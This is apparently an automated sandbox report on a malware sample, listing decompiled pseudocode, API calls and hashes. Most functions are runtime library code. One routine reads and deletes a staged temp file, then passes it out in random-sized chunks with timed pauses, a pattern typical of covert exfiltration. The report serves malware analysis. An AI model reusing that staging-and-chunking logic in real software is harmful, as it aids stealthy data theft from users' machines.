							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























        0x0123fa2a
        0x0123fa31
        0x0123fa36
        0x0123fa3c
        0x0123fa3f
        0x0123fa45
        0x0123fa4a
        0x0123fa4f
        0x0123fa4f
        0x0123fa55
        0x0123fa5a
        0x0123fa5f
        0x0123fa5f
        0x0123fa66
        0x0123fa6b
        0x0123fa70
        0x0123fa70
        0x0123fa77
        0x0123fa7c
        0x0123fa81
        0x0123fa81
        0x0123fa88
        0x0123fa8d
        0x0123fa92
        0x0123fa92
        0x0123fa9a
        0x0123faaa
        0x0123fabc
        0x0123face
        0x0123fae1
        0x0123faf3
        0x0123fafb
        0x0123fb00
        0x0123fb05
        0x0123fb05
        0x0123fb0c
        0x0123fb11
        0x0123fb11
        0x0123fb18
        0x0123fb1d
        0x0123fb1d
        0x0123fb24
        0x0123fb29
        0x0123fb29
        0x0123fb30
        0x0123fb35
        0x0123fb35
        0x0123fb3f
        0x0123fb41
        0x0123fb7b
        0x0123fb43
        0x0123fb48
        0x0123fb6c
        0x0123fb74
        0x0123fb68
        0x0123fb68
        0x0123fb7e
        0x0123fb85
        0x0123fb87
        0x0123fba9
        0x0123fbb1
        0x0123fbb4
        0x0123fbb4
        0x0123fbb6
        0x0123fbb6
        0x0123fbc1
        0x0123fbc7
        0x0123fbcc
        0x0123fbd3
        0x0123fc0d
        0x0123fc18
        0x0123fc1e
        0x0123fc21
        0x0123fc24
        0x0123fc30
        0x0123fc38
        0x0123fbd5
        0x0123fbd8
        0x0123fbe4
        0x0123fbea
        0x0123fbf0
        0x0123fbf3
        0x0123fbfc
        0x0123fbfc
        0x0123fc3b
        0x0123fc49
        0x0123fc4f
        0x0123fc56
        0x0123fc58
        0x0123fc58
        0x0123fc5f
        0x0123fc61
        0x0123fc61
        0x0123fc68
        0x0123fc6a
        0x0123fc6a
        0x0123fc71
        0x0123fc73
        0x0123fc73
        0x0123fc7a
        0x0123fc7c
        0x0123fc7c
        0x0123fc89
        0x0123fc8c
        0x0123fcc3
        0x0123fc8e
        0x0123fc8e
        0x0123fc91
        0x0123fcbc
        0x0123fcb1
        0x0123fcb1
        0x0123fcc5
        0x0123fccd
        0x0123fcd0
        0x0123fcef
        0x0123fcf4
        0x0123fcf4
        0x0123fcf6
        0x0123fcfb
        0x0123fd07
        0x0123fcfd
        0x0123fd00
        0x0123fd00
        0x0123fd0c
        0x0123fd0c
        0x0123fcd2
        0x0123fcd5
        0x0123fce4
        0x00000000
        0x0123fce4
        0x0123fcd7
        0x0123fcda
        0x0123fcdc
        0x0123fcdc
        0x00000000
        0x0123fcda
        0x0123fc93
        0x0123fc96
        0x0123fcac
        0x00000000
        0x0123fcac
        0x0123fc9b
        0x0123fc9d
        0x0123fc9d
        0x0123fc9b
        0x00000000
        0x0123fc8c
        0x0123fb8e
        0x0123fb9c
        0x0123fba4
        0x00000000
        0x0123fba4
        0x0123fb92
        0x0123fb97
        0x0123fb97
        0x00000000
        0x0123fb92
        0x0123fb4f
        0x0123fb5d
        0x0123fb65
        0x00000000
        0x0123fb65
        0x0123fb53
        0x0123fb58
        0x0123fb58
        0x0123fb53

        APIs
        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0123FA17,?,?,00000008,?,?,0123F6B7,00000000), ref: 0123FC49
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: ExceptionRaise
        • String ID:
        • API String ID: 3997070919-0
        • Opcode ID: 3c1d851b070b13daf33430d33dc613125ab588a54e22bb85be7877a3b2860297
        • Instruction ID: 1b22e86d9186237937f29ab13145b38f65e04282f81d9c57c54d83084e11a762
        • Opcode Fuzzy Hash: 3c1d851b070b13daf33430d33dc613125ab588a54e22bb85be7877a3b2860297
        • Instruction Fuzzy Hash: 9FB19FB15206098FE718CF2CD586B647FE1FF89364F258658EA99CF2A1C335D982CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 012346F7, Relevance: 1.5, Strings: 1, Instructions: 214COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 88%
        			E012346F7(intOrPtr* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				intOrPtr* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E01234DEF(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E0123407D(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E01234F66(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E0123407D(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E01234EBF(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E0123407D(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E01234BFA(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E01234DD7(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E01234A10(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E01234D44(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E01234DB8(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E012349AD(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E01234B6A(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}





































        0x012346fc
        0x012346ff
        0x01234703
        0x01234706
        0x0123470a
        0x0123470d
        0x0123477b
        0x0123477e
        0x012347cd
        0x012347cd
        0x012347d0
        0x0123473d
        0x0123473f
        0x01234744
        0x01234746
        0x012347eb
        0x012347ef
        0x012347f8
        0x012347fd
        0x012347fe
        0x01234802
        0x01234804
        0x01234809
        0x0123480c
        0x0123480e
        0x01234837
        0x01234837
        0x0123483a
        0x0123483d
        0x01234844
        0x01234846
        0x01234849
        0x0123484b
        0x0123484f
        0x0123484f
        0x01234852
        0x0123485d
        0x0123485d
        0x0123485f
        0x0123485f
        0x01234861
        0x01234867
        0x01234867
        0x0123486c
        0x0123486f
        0x0123487a
        0x0123487a
        0x0123487c
        0x0123487c
        0x01234887
        0x0123488b
        0x0123488b
        0x0123488e
        0x01234894
        0x01234896
        0x01234899
        0x012348a9
        0x012348ae
        0x012348ae
        0x012348c3
        0x012348c8
        0x012348cb
        0x012348d0
        0x012348d3
        0x012348d5
        0x012348d7
        0x012348da
        0x012348dd
        0x012348ea
        0x012348ef
        0x012348ef
        0x012348dd
        0x012348f6
        0x012348fb
        0x012348fe
        0x01234903
        0x01234906
        0x01234908
        0x01234915
        0x0123491a
        0x01234908
        0x0123491d
        0x01234920
        0x01234925
        0x01234925
        0x01234871
        0x01234874
        0x00000000
        0x00000000
        0x01234876
        0x00000000
        0x01234876
        0x01234863
        0x01234865
        0x00000000
        0x00000000
        0x00000000
        0x01234865
        0x01234854
        0x01234857
        0x00000000
        0x00000000
        0x01234859
        0x00000000
        0x01234859
        0x0123484d
        0x0123484d
        0x0123484d
        0x00000000
        0x0123484d
        0x0123483f
        0x01234842
        0x00000000
        0x00000000
        0x00000000
        0x01234842
        0x01234812
        0x01234815
        0x01234817
        0x0123481f
        0x01234821
        0x0123482b
        0x0123482d
        0x0123482f
        0x00000000
        0x00000000
        0x01234831
        0x01234835
        0x01234835
        0x00000000
        0x01234835
        0x01234823
        0x00000000
        0x01234823
        0x01234819
        0x00000000
        0x01234819
        0x012347f1
        0x00000000
        0x012347f1
        0x0123474c
        0x0123474c
        0x00000000
        0x0123474c
        0x012347d7
        0x012347d7
        0x012347da
        0x012347ac
        0x012347ac
        0x012347ad
        0x012347af
        0x012347b1
        0x00000000
        0x012347b1
        0x012347dc
        0x012347df
        0x00000000
        0x00000000
        0x012347e5
        0x01234754
        0x01234754
        0x00000000
        0x01234754
        0x01234780
        0x012347c3
        0x00000000
        0x012347c3
        0x01234782
        0x01234785
        0x012347b8
        0x012347ba
        0x00000000
        0x012347ba
        0x01234787
        0x0123478a
        0x012347a8
        0x012347a8
        0x012347a8
        0x012347a8
        0x00000000
        0x012347a8
        0x0123478c
        0x0123478f
        0x012347a1
        0x00000000
        0x012347a1
        0x01234791
        0x01234794
        0x00000000
        0x00000000
        0x01234798
        0x00000000
        0x01234798
        0x0123470f
        0x00000000
        0x00000000
        0x01234715
        0x01234718
        0x01234758
        0x01234758
        0x0123475b
        0x01234774
        0x00000000
        0x01234774
        0x0123475d
        0x0123475d
        0x01234760
        0x00000000
        0x00000000
        0x01234763
        0x01234766
        0x00000000
        0x00000000
        0x01234768
        0x0123476b
        0x00000000
        0x0123476b
        0x0123471a
        0x01234753
        0x00000000
        0x01234753
        0x0123471f
        0x00000000
        0x00000000
        0x01234728
        0x00000000
        0x00000000
        0x0123472d
        0x00000000
        0x00000000
        0x01234732
        0x00000000
        0x00000000
        0x0123473b
        0x00000000
        0x00000000
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
        • Instruction ID: f34816935587fc37be5d3118effd456aba1c9fbe77f0c4ec71a3555c690db315
        • Opcode Fuzzy Hash: f8a09bf90652abba03e4c4632af07912c1671ed9223366bd2e24022b032d3914
        • Instruction Fuzzy Hash: 8D5137E0B307C75AEB3EB56C8859BBE2BC59FD3204F4805D9DB42CB282C645D646C356
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123A191, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0123A191() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x124a198 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




        0x0123a191
        0x0123a199
        0x0123a1a1

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: e0fd1abeb5ea448f0876e86ed5d3301e6288eb1097e63285a1aeb3608ce9dce5
        • Instruction ID: b7ff8cea6fc2358581017fe3653131cb57cb180bac945fd31c0391ee06ace6f5
        • Opcode Fuzzy Hash: e0fd1abeb5ea448f0876e86ed5d3301e6288eb1097e63285a1aeb3608ce9dce5
        • Instruction Fuzzy Hash: 78A0223C200200CF83208F32B28E30C3BECBB002C030A0028B20EC2008EB3080C0EF00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01231C20, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 206filesleepmemoryCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 91%
        			E01231C20(void* __ebx) {
				signed int _v8;
				char _v268;
				void* _v272;
				long _v276;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				void* _t37;
				signed int _t47;
				intOrPtr _t56;
				intOrPtr _t66;
				intOrPtr _t75;
				intOrPtr _t79;
				long _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t92;
				void* _t96;
				void* _t100;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t113;
				signed int _t116;
				signed int _t119;

				_t30 =  *0x1249004; // 0x5a4607f2
				_v8 = _t30 ^ _t119;
				_t112 = 0;
				_v276 = 0;
				E012333D0(0,  &_v268, 0, 0x104);
				_t113 = CreateFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp", 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t113 != 0xffffffff) {
					_push(__ebx);
					_t84 = GetFileSize(_t113, 0);
					if(_t84 != 0) {
						_t12 = _t84 + 0x20; // 0x20
						_t37 = LocalAlloc(0x40, _t12);
						_v272 = _t37;
						if(_t37 != 0) {
							_t88 =  &_v276;
							if(ReadFile(_t113, _t37, _t84,  &_v276, 0) != 0) {
								CloseHandle(_t113);
								DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp");
								E01233C78( &_v276, GetTickCount());
								if(_t84 != 0) {
									asm("o16 nop [eax+eax]");
									do {
										_t113 = _t84 - _t112;
										_t47 = E01233C57(_t88) & 0x800001ff;
										if(_t47 < 0) {
											_t47 = (_t47 - 0x00000001 | 0xfffffe00) + 1;
										}
										if(_t47 + 0x200 < _t113) {
											_t116 = E01233C57(_t88) & 0x800001ff;
											if(_t116 < 0) {
												_t116 = (_t116 - 0x00000001 | 0xfffffe00) + 1;
											}
											_t113 = _t116 + 0x200;
										}
										_t104 = _t113;
										_t88 = _v272 + _t112;
										E01231A90(_v272 + _t112, _t113);
										_t112 = _t112 + _t113;
										Sleep(0x2710);
									} while (_t112 < _t84);
								}
								LocalFree(_v272);
								_pop(_t85);
								return E01232550(_t85, _v8 ^ _t119, _t104, _t112, _t113);
							} else {
								E012316A0( &_v268, 0x104, "RFE:%08x", GetLastError());
								_t105 =  &_v268;
								_t92 = _t105 + 1;
								do {
									_t56 =  *_t105;
									_t105 = _t105 + 1;
								} while (_t56 != 0);
								E01231A90( &_v268, _t105 - _t92);
								LocalFree(_v272);
								CloseHandle(_t113);
								DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp");
								_pop(_t86);
								return E01232550(_t86, _v8 ^ _t119, _t105 - _t92, 0, _t113);
							}
						} else {
							E012316A0( &_v268, 0x104, "LAE:%08x", GetLastError());
							_t107 =  &_v268;
							_t96 = _t107 + 1;
							do {
								_t66 =  *_t107;
								_t107 = _t107 + 1;
							} while (_t66 != 0);
							goto L11;
						}
					} else {
						E012316A0( &_v268, 0x104, "GFSE:%08x", GetLastError());
						_t109 =  &_v268;
						_t96 = _t109 + 1;
						do {
							_t75 =  *_t109;
							_t109 = _t109 + 1;
						} while (_t75 != 0);
						L11:
						E01231A90( &_v268, _t107 - _t96);
						CloseHandle(_t113);
						DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp");
						_pop(_t87);
						return E01232550(_t87, _v8 ^ _t119, _t107 - _t96, _t112, _t113);
					}
				} else {
					E012316A0( &_v268, 0x104, "CFE:%08x", GetLastError());
					_t110 =  &_v268;
					_t100 = _t110 + 1;
					do {
						_t79 =  *_t110;
						_t110 = _t110 + 1;
					} while (_t79 != 0);
					E01231A90( &_v268, _t110 - _t100);
					return E01232550(__ebx, _v8 ^ _t119, _t110 - _t100, 0, _t113);
				}
			}































        0x01231c29
        0x01231c30
        0x01231c3a
        0x01231c3c
        0x01231c4e
        0x01231c71
        0x01231c76
        0x01231cc7
        0x01231cd1
        0x01231cd5
        0x01231d09
        0x01231d0f
        0x01231d15
        0x01231d1d
        0x01231d83
        0x01231d95
        0x01231e06
        0x01231e11
        0x01231e1e
        0x01231e28
        0x01231e2a
        0x01231e30
        0x01231e32
        0x01231e39
        0x01231e3e
        0x01231e46
        0x01231e46
        0x01231e4e
        0x01231e57
        0x01231e5d
        0x01231e66
        0x01231e66
        0x01231e67
        0x01231e67
        0x01231e73
        0x01231e75
        0x01231e78
        0x01231e82
        0x01231e84
        0x01231e8a
        0x01231e30
        0x01231e94
        0x01231ea2
        0x01231eaf
        0x01231d97
        0x01231daf
        0x01231db4
        0x01231dbd
        0x01231dc0
        0x01231dc0
        0x01231dc2
        0x01231dc3
        0x01231dcf
        0x01231dda
        0x01231de1
        0x01231dec
        0x01231df2
        0x01231e04
        0x01231e04
        0x01231d1f
        0x01231d37
        0x01231d3c
        0x01231d45
        0x01231d48
        0x01231d48
        0x01231d4a
        0x01231d4b
        0x00000000
        0x01231d48
        0x01231cd7
        0x01231cef
        0x01231cf4
        0x01231cfd
        0x01231d00
        0x01231d00
        0x01231d02
        0x01231d03
        0x01231d4f
        0x01231d57
        0x01231d5d
        0x01231d68
        0x01231d6e
        0x01231d80
        0x01231d80
        0x01231c78
        0x01231c90
        0x01231c95
        0x01231c9e
        0x01231ca1
        0x01231ca1
        0x01231ca3
        0x01231ca4
        0x01231cb0
        0x01231cc6
        0x01231cc6

        APIs
        • CreateFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01231C6B
        • GetLastError.KERNEL32 ref: 01231C78
        • GetFileSize.KERNEL32(00000000,00000000), ref: 01231CCB
        • GetLastError.KERNEL32 ref: 01231CD7
        • LocalAlloc.KERNEL32(00000040,00000020), ref: 01231D0F
        • GetLastError.KERNEL32 ref: 01231D1F
        • CloseHandle.KERNEL32(00000000), ref: 01231D5D
        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp), ref: 01231D68
        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01231D8D
        • GetLastError.KERNEL32 ref: 01231D97
        • LocalFree.KERNEL32(?), ref: 01231DDA
        • CloseHandle.KERNEL32(00000000), ref: 01231DE1
        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp), ref: 01231DEC
        • CloseHandle.KERNEL32(00000000), ref: 01231E06
        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp), ref: 01231E11
        • GetTickCount.KERNEL32 ref: 01231E17
        • Sleep.KERNEL32(00002710), ref: 01231E84
        • LocalFree.KERNEL32(?), ref: 01231E94
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: File$ErrorLast$CloseDeleteHandleLocal$Free$AllocCountCreateReadSizeSleepTick
        • String ID: C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp$CFE:%08x$GFSE:%08x$LAE:%08x$RFE:%08x
        • API String ID: 1169547061-3737964938
        • Opcode ID: feb69d358683f3625693b847a64f17ec7b08f61cb3d5064c7dd3f62fd4670ad9
        • Instruction ID: 6696fbe3ee7915a38c715d8cfdd76171a372c90f4eeeca3f996221419a408d40
        • Opcode Fuzzy Hash: feb69d358683f3625693b847a64f17ec7b08f61cb3d5064c7dd3f62fd4670ad9
        • Instruction Fuzzy Hash: BC6168B5920115DFDB25EFA9FC48BF97379EFA5300F000194FA4A96181DFB14A85CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123D68D, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 460 123d68d-123d6ea GetConsoleCP 461 123d6f0-123d70c 460->461 462 123d82d-123d83f call 1232550 460->462 464 123d727-123d738 call 123830b 461->464 465 123d70e-123d725 461->465 472 123d73a-123d73d 464->472 473 123d75e-123d760 464->473 467 123d761-123d770 call 1237101 465->467 467->462 474 123d776-123d796 WideCharToMultiByte 467->474 475 123d743-123d755 call 1237101 472->475 476 123d804-123d823 472->476 473->467 474->462 477 123d79c-123d7b2 WriteFile 474->477 475->462 482 123d75b-123d75c 475->482 476->462 480 123d825-123d82b GetLastError 477->480 481 123d7b4-123d7c5 477->481 480->462 481->462 483 123d7c7-123d7cb 481->483 482->474 484 123d7f9-123d7fc 483->484 485 123d7cd-123d7eb WriteFile 483->485 484->461 487 123d802 484->487 485->480 486 123d7ed-123d7f1 485->486 486->462 488 123d7f3-123d7f6 486->488 487->462 488->484
        C-Code - Quality: 79%
        			E0123D68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				signed int _t128;
				signed char* _t129;
				intOrPtr* _t130;
				signed int _t131;
				void* _t132;

				_t78 =  *0x1249004; // 0x5a4607f2
				_v8 = _t78 ^ _t131;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t129 = _a12;
				_v52 = _t129;
				_v48 = _t117;
